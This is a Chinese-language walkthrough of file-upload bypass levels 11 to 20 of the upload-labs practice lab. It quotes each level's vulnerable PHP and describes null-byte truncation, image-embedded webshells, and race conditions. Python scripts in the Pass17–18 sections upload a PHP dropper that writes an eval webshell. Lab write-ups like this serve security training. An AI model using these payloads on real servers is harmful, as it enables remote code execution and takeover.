Pass11 GET00截断
先来看看这一关核心代码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
这一关的文件保存路径没有处理,而是直接拼接函数名称,再拼接文件类型,所以可以使用利用00截断绕过。 00截断条件需要满足:php版本小于5.3.4, 且php的magic_quotes_gpc 为OFF状态(之前没改,一直失败)。 我们用Burp抓包后可以看见:数据包中存在save_path ,这一关用00截断来绕过。
在windows系统中读到00时就认为结束了,我们可以利用这一点来进行00截断。 在路径后加上1.php%00 并且将文件名改成.jpg 。这样拼接后的路径在读到00时就会结束。 可以看到已经上传成功了。 我们用蚁剑来连接一下: 连接成功!
Pass12 POST00截断
我们来先看看这一关的核心代码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
if(in_array($file_ext,$ext_arr)){
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传失败";
}
} else {
$msg = "只允许上传.jpg|.png|.gif类型文件!";
}
}
这一关和上一关一样是用00截断来做,不同的在于这一关是POST型的,不能用%00,系统不会将%00作为url编码处理,而是当成字符串处理。 我们先用Brup来抓包: 在保存地址后加入1.php+ ,+ 号其可以换成任何字符,只是我认为+ 号的16进制编码好找,故使用+ 号。再把上传的后缀名改成.jpg|.png|.gif 中一个。 最后再网页的hex 值,+ 号的16进制是2b ,找到后改成00。 我们可以看到文件上传成功: 我们用蚁剑来连接一下: 连接成功!
Pass13 图片马绕过
这一关看页面就知道是使用图片马来绕过。
我们先来分析一下核心代码:
function getReailFileType($filename){
$file = fopen($filename, "rb");
$bin = fread($file, 2);
fclose($file);
$strInfo = @unpack("C2chars", $bin);
$typeCode = intval($strInfo['chars1'].$strInfo['chars2']);
$fileType = '';
switch($typeCode){
case 255216:
$fileType = 'jpg';
break;
case 13780:
$fileType = 'png';
break;
case 7173:
$fileType = 'gif';
break;
default:
$fileType = 'unknown';
}
return $fileType;
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_type = getReailFileType($temp_file);
if($file_type == 'unknown'){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$file_type;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
可以看到服务器会分析我们上传的文件的文件头来确定文件类型。 我们来准备一个图片马,先准备一张图片和一句话木马的文件。 用windows命令行来将其合成一个包含一句话木马的图片文件。 然后上传我们制作好的图片马:上传成功! 我们用蚁剑来连接一下: 连接成功!
Pass14 图片码绕过
这一关一样是图片马绕过,我们看一下核心代码:
function isImage($filename){
$types = '.jpeg|.png|.gif';
if(file_exists($filename)){
$info = getimagesize($filename);
$ext = image_type_to_extension($info[2]);
if(stripos($types,$ext)>=0){
return $ext;
}else{
return false;
}
}else{
return false;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
这一关是用image_type_to_extension 获取图片后缀来进行比较。 我们一样用上一关的图片马来进行绕过。 可以看到上传成功! 我们用蚁剑来连接一下: 连接成功
Pass15 exif_imagetype绕过
这一关也是图片马绕过:
我们先看一下核心代码:
function isImage($filename){
$image_type = exif_imagetype($filename);
switch ($image_type) {
case IMAGETYPE_GIF:
return "gif";
break;
case IMAGETYPE_JPEG:
return "jpg";
break;
case IMAGETYPE_PNG:
return "png";
break;
default:
return false;
break;
}
}
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$temp_file = $_FILES['upload_file']['tmp_name'];
$res = isImage($temp_file);
if(!$res){
$msg = "文件未知,上传失败!";
}else{
$img_path = UPLOAD_PATH."/".rand(10, 99).date("YmdHis").".".$res;
if(move_uploaded_file($temp_file,$img_path)){
$is_upload = true;
} else {
$msg = "上传出错!";
}
}
}
exif_imagetype 函数是php 判断图片类型的函数。 做这一关的实验要先打开php 的exif 扩展方法。 先在php.ini 文件中找到;extension=php_exif.dll ,然后找到;extension=php_mbstring.dll ,去掉前面的分号,并将此行移动到extension=php_exif.dll 之前。 再找到[exif]段,把下面语句的分号去掉: ;exif.encode_unicode = ISO-8859-15 ;exif.decode_unicode_motorola = UCS-2BE ;exif.decode_unicode_intel = UCS-2LE ;exif.encode_jis = ;exif.decode_jis_motorola = JIS ;exif.decode_jis_intel = JIS 完成后重启服务。再上传我们的图片马。 上传成功! 我们用蚁剑来连接一下: 连接成功!
Pass16 二次渲染绕过
这一关虽然也是用图片马。但是和前面三关都不一样。 我们看看核心代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])){
$filename = $_FILES['upload_file']['name'];
$filetype = $_FILES['upload_file']['type'];
$tmpname = $_FILES['upload_file']['tmp_name'];
$target_path=UPLOAD_PATH.'/'.basename($filename);
$fileext= substr(strrchr($filename,"."),1);
if(($fileext == "jpg") && ($filetype=="image/jpeg")){
if(move_uploaded_file($tmpname,$target_path)){
$im = imagecreatefromjpeg($target_path);
if($im == false){
$msg = "该文件不是jpg格式的图片!";
@unlink($target_path);
}else{
srand(time());
$newfilename = strval(rand()).".jpg";
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagejpeg($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "png") && ($filetype=="image/png")){
if(move_uploaded_file($tmpname,$target_path)){
$im = imagecreatefrompng($target_path);
if($im == false){
$msg = "该文件不是png格式的图片!";
@unlink($target_path);
}else{
srand(time());
$newfilename = strval(rand()).".png";
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagepng($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else if(($fileext == "gif") && ($filetype=="image/gif")){
if(move_uploaded_file($tmpname,$target_path)){
$im = imagecreatefromgif($target_path);
if($im == false){
$msg = "该文件不是gif格式的图片!";
@unlink($target_path);
}else{
srand(time());
$newfilename = strval(rand()).".gif";
$img_path = UPLOAD_PATH.'/'.$newfilename;
imagegif($im,$img_path);
@unlink($target_path);
$is_upload = true;
}
} else {
$msg = "上传出错!";
}
}else{
$msg = "只允许上传后缀为.jpg|.png|.gif的图片文件!";
}
}
这一关的核心是我们上传的图片在经过二次渲染后和原来的图片代码不一样了。 但是我们通过WinHex工具对我们上传前和上传后的图片进行对比后可以发现:中间有一部分16进制码是没有变化的。 我们只需要在这一部分16进制码插入我们的一句话木马,再上传就可以控制靶机了。 但是这个办法只适用于.gif 的文件队友.png 和.jpg 的文件不想.gif 那么简单。 关于二次渲染的详解可以看看这篇博客:二次渲染详解,写的很好。
Pass17 条件竞争绕过
看看这一关的核心代码:
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
$ext_arr = array('jpg','png','gif');
$file_name = $_FILES['upload_file']['name'];
$temp_file = $_FILES['upload_file']['tmp_name'];
$file_ext = substr($file_name,strrpos($file_name,".")+1);
$upload_file = UPLOAD_PATH . '/' . $file_name;
if(move_uploaded_file($temp_file, $upload_file)){
if(in_array($file_ext,$ext_arr)){
$img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
rename($upload_file, $img_path);
$is_upload = true;
}else{
$msg = "只允许上传.jpg|.png|.gif类型文件!";
unlink($upload_file);
}
}else{
$msg = '上传出错!';
}
}
可以看到他是先将其保存到下载路径后再进行判断,如果文件不满足要求再将其删除。我们就可以利用这个文件存在的一瞬间来访问它。 我们可以写两个python脚本,一个负责上传,一个负责访问 上传脚本:
import hackhttp
from multiprocessing.dummy import Pool as ThreadPool
def upload(i):
hh = hackhttp.hackhttp()
raw = """POST /upload-labs-0.1/Pass-17/index.php HTTP/1.1
Host: 192.168.48.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------109839045441880920413934984040
Content-Length: 394
Origin: http://192.168.48.138
Connection: close
Referer: http://192.168.48.138/upload-labs-0.1/Pass-17/index.php
Upgrade-Insecure-Requests: 1
-----------------------------109839045441880920413934984040
Content-Disposition: form-data; name="upload_file"; filename="attch.php"
Content-Type: application/octet-stream
<?php
fputs(fopen('shell.php','w'),'<?php eval(@$_POST["a"]) ?>');
?>
-----------------------------109839045441880920413934984040
Content-Disposition: form-data; name="submit"
sumbit
-----------------------------109839045441880920413934984040--
"""
code, head, html, redirect, log = hh.http('http://192.168.48.138/upload-labs-0.1/Pass-17/index.php', raw = raw)
pool = ThreadPool(50)
pool.map(upload, range(5000))
pool.close()
pool.join()
上传脚本主要是为了将
<?php
fputs(fopen('shell.php','w'),'<?php eval(@$_POST["a"]) ?>');
?>
php 文件传入靶机中,当在它被删除前成功访问到时就会新建一个一句话木马的php 文件。
访问脚本
import hackhttp
from multiprocessing.dummy import Pool as ThreadPool
def upload(i):
hh = hackhttp.hackhttp()
code, head, html, redirect, log = hh.http('http://192.168.48.138/upload-labs-0.1/upload/attch.php')
if code == 200:
print ("条件竞争上传成功")
pool = ThreadPool(50)
pool.map(upload, range(5000))
pool.close()
pool.join()
运行两个脚本后可以看见靶机上生成了一句话木马: 我们用蚁剑来连接一下: 连接成功!
Pass18 条件竞争绕过加解析漏洞绕过
在攻击前我们还是先来看看核心代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit']))
{
require_once("./myupload.php");
$imgFileName =time();
$u = new MyUpload($_FILES['upload_file']['name'], $_FILES['upload_file']['tmp_name'], $_FILES['upload_file']['size'],$imgFileName);
$status_code = $u->upload(UPLOAD_PATH);
switch ($status_code) {
case 1:
$is_upload = true;
$img_path = $u->cls_upload_dir . $u->cls_file_rename_to;
break;
case 2:
$msg = '文件已经被上传,但没有重命名。';
break;
case -1:
$msg = '这个文件不能上传到服务器的临时文件存储目录。';
break;
case -2:
$msg = '上传失败,上传目录不可写。';
break;
case -3:
$msg = '上传失败,无法上传该类型文件。';
break;
case -4:
$msg = '上传失败,上传的文件过大。';
break;
case -5:
$msg = '上传失败,服务器已经存在相同名称文件。';
break;
case -6:
$msg = '文件无法上传,文件不能复制到目标目录。';
break;
default:
$msg = '未知错误!';
break;
}
}
class MyUpload{
......
......
......
var $cls_arr_ext_accepted = array(
".doc", ".xls", ".txt", ".pdf", ".gif", ".jpg", ".zip", ".rar", ".7z",".ppt",
".html", ".xml", ".tiff", ".jpeg", ".png" );
......
......
......
function upload( $dir ){
$ret = $this->isUploadedFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->setDir( $dir );
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkExtension();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
$ret = $this->checkSize();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
if( $this->cls_file_exists == 1 ){
$ret = $this->checkFileExists();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
$ret = $this->move();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
if( $this->cls_rename_file == 1 ){
$ret = $this->renameFile();
if( $ret != 1 ){
return $this->resultUpload( $ret );
}
}
return $this->resultUpload( "SUCCESS" );
}
......
......
......
};
我们可以改一下上一关的代码继续使用:
import hackhttp
from multiprocessing.dummy import Pool as ThreadPool
def upload(i):
hh = hackhttp.hackhttp()
raw = '''POST /upload-labs-0.1/Pass-18/index.php HTTP/1.1
Host: 192.168.48.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------193524125316679657852485763439
Content-Length: 394
Origin: http://192.168.48.138
Connection: close
Referer: http://192.168.48.138/upload-labs-0.1/Pass-18/index.php
Upgrade-Insecure-Requests: 1
-----------------------------193524125316679657852485763439
Content-Disposition: form-data; name="upload_file"; filename="attch.php.7z"
Content-Type: application/octet-stream
<?php
fputs(fopen('shell.php','w'),'<?php eval(@$_POST["a"]) ?>');
?>
-----------------------------193524125316679657852485763439
Content-Disposition: form-data; name="submit"
涓婁紶
-----------------------------193524125316679657852485763439--
'''
code, head, html, redirect, log = hh.http('http://192.168.48.138/upload-labs-0.1/Pass-18/index.php', raw = raw)
print (code)
pool = ThreadPool(50)
pool.map(upload, range(5000))
pool.close()
pool.join()
我们也是利用了它对文件都进行了重命名,当多个文件同时到达时,系统对其中一个重命名时,另几个则刚好“逃脱”,那么就可以上传成功。 再利用appche的一个解析漏洞,在有多个后缀名时,appche会从右向左依次解析,直到后缀名可以解析为止,所以它会将.php.7z 当作.php 来解析,而7z 也在白名单内。 然后可以通过访问这个文件来生成新的一句话木马文件。 但是我尝试了很多浏览器去访问都无法生成新的一句话木马,而且浏览器会将.7z 作为压缩包文件进行下载,然后我又尝试了.aaa ,.bbb 之类的后缀名,也一直不成功。也在网上尝试了很多方法,都没有成功。
Pass19 00截断
我们先看看这一关的关键代码:
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");
$file_name = $_POST['save_name'];
$file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
if(!in_array($file_ext,$deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
}else{
$msg = '上传出错!';
}
}else{
$msg = '禁止保存为该类型文件!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
这一关主要是利用move_uploaded_file() 函数,它在遇到\x00 后会自动截断路径名。我们就可以利用这一点来使用00截断。 我们先抓包: 新的文件名是通过读取save_name 里的数据来赋值的。 我们来针对save_name 来修改数据。 我们将save_name 的数据改成了1.php+2.jpg ,在将+ 的16进制改成00 : 当程序检测时后缀名时.jpg ,但是在使用move_uploaded_file() 函数后就会在00 处截断。文件名就变成1.php 。 可以看见上传成功。 我们用蚁剑来连接一下。 连接成功!
Pass20 数组绕过
我们看看这一关的核心代码:
$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
$allow_type = array('image/jpeg','image/png','image/gif');
if(!in_array($_FILES['upload_file']['type'],$allow_type)){
$msg = "禁止上传该类型文件!";
}else{
$file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
if (!is_array($file)) {
$file = explode('.', strtolower($file));
}
$ext = end($file);
$allow_suffix = array('jpg','png','gif');
if (!in_array($ext, $allow_suffix)) {
$msg = "禁止上传该后缀文件!";
}else{
$file_name = reset($file) . '.' . $file[count($file) - 1];
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' .$file_name;
if (move_uploaded_file($temp_file, $img_path)) {
$msg = "文件上传成功!";
$is_upload = true;
} else {
$msg = "文件上传失败!";
}
}
}
}else{
$msg = "请选择要上传的文件!";
}
后台会检测我们上传的save_name 的数据是否为数组,如果不是则会将其以. 进行分割变成一个数组。文件名是数组第一个元素,而后缀名是最后一个元素。程序会检测后缀名是否为jpg|png|gif 中的一个。 检测完后会再执行$file_name = reset($file) . '.' . $file[count($file) - 1]; 语句,会将数组的第一个元素和数组长度减一的元素进行拼接,变成新的文件名。 我们自然而然会认为数组长度减一的元素和数组最后一个元素是一样的。但是我们可以通过改变数组下标来使其不一样。 比如设置save_name[0] = 1.php 和save_name[2] = jpg ,这时在进行第一次检测后缀名时是用end($file) ,得到的是 jpg 。但是第二次时进行拼接是用$file[count($file) - 1 这时的count($file) 是2,[count($file) - 1 就是1,而save_name[1] 是空的,最后拼接后就会变成 1.php. ,在windows系统中最后的点也会消掉,最后的文件名就变成了 1.php 。 我们用burp抓包来尝试一下: 可以发现上传成功! 我们用蚁剑来连接一下: 连接成功!
|